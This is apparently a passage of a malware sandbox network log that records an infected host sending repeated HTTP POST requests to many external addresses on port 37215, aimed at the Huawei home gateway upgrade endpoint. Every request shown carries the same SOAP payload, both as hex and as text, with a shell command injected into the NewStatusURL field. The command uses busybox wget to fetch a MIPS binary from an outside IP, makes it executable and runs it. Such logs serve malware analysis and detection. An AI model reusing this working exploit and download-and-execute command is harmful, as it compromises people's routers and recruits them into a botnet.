                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1026192.168.2.1349986156.82.237.14837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.519936085 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1027192.168.2.1355610197.205.236.11037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.523806095 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1028192.168.2.135126641.49.7.24537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.527067900 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1029192.168.2.136073441.106.253.13637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.530147076 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1030192.168.2.1351128197.123.213.15437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.533504009 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1031192.168.2.134175241.254.225.15537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.536799908 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1032192.168.2.133799441.246.131.20037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.540298939 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1033192.168.2.135787441.229.32.14437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.543684959 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1034192.168.2.1334398156.176.147.10637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.547568083 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1035192.168.2.1337444197.197.45.14137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.551109076 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
